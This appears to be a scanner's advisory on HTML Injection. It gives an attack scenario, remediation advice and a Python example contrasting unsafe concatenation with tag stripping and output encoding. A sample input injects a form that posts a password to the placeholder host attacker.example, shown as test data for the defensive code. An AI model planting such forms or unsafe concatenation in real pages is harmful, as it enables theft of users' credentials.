HTML Injection

Description

During the scan, Kayran found that HTML Injection is possible.
This vulnerability occurs when user input is not correctly validated and the output is not encoded.

A successful HTML Injection allows the attacker to send malicious HTML pages to a victim.
This could allow the attacker to change or delete certain things on the site.

A possible attack scenario is shown below:

1. The attacker discovers an injection vulnerability and decides to use an HTML-based injection attack.
2. He then crafts a malicious link, including his injected HTML content, and sends it to a user via email.
3. The user visits the page because it is located within a trusted domain.
4. The attacker’s injected HTML is rendered and presented to the user, asking for a username and password.
5. The user enters a username and password, which are both sent to the attacker’s server.

Recommendation

Look for HTML elements in the incoming HTTP stream that contain the user’s input.
Remove any HTML-syntax substrings (such as tags and links) from any user-supplied text to prevent these situations.
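
The following is an added example, not code from Kayran or from the original page. It shows the vulnerable concatenation pattern beside a version that removes tags from the input and also encodes the output, which covers entity-encoded input that tag removal alone lets through. The function names, the sample inputs and the attacker.example host are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser


class _TextOnly(HTMLParser):
    """Keeps text nodes and records whether any markup was present."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts, self.had_markup = [], False

    def handle_starttag(self, tag, attrs):
        self.had_markup = True

    def handle_endtag(self, tag):
        self.had_markup = True

    def handle_comment(self, data):
        self.had_markup = True

    def handle_data(self, data):
        self.parts.append(data)


def strip_html(value):
    """Return (text without tags, True if tags were found) for user input."""
    parser = _TextOnly()
    parser.feed(value)
    parser.close()
    return "".join(parser.parts), parser.had_markup


def render_unsafe(name):
    # Vulnerable pattern: user input is concatenated into the page as-is.
    return "<p>Hello, " + name + "</p>"


def render_safe(name):
    # Strip markup on input, then encode on output. The encoding step is what
    # keeps entity-encoded input such as "&lt;b&gt;" from turning into a tag.
    text, _ = strip_html(name)
    return "<p>Hello, " + html.escape(text, quote=True) + "</p>"


# Constructed sample inputs (attacker.example is a placeholder host).
FORM_INPUT = 'Bob<form action="https://attacker.example/login"><input name="password"></form>'
ENCODED_INPUT = "&lt;b&gt;Bob&lt;/b&gt;"

if __name__ == "__main__":
    for sample in (FORM_INPUT, ENCODED_INPUT):
        print(strip_html(sample)[1], render_unsafe(sample), render_safe(sample), sep="\n")
```

The boolean returned by strip_html can be logged as a detection signal for input that carried markup.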

References

https://cwe.mitre.org/data/definitions/80.html
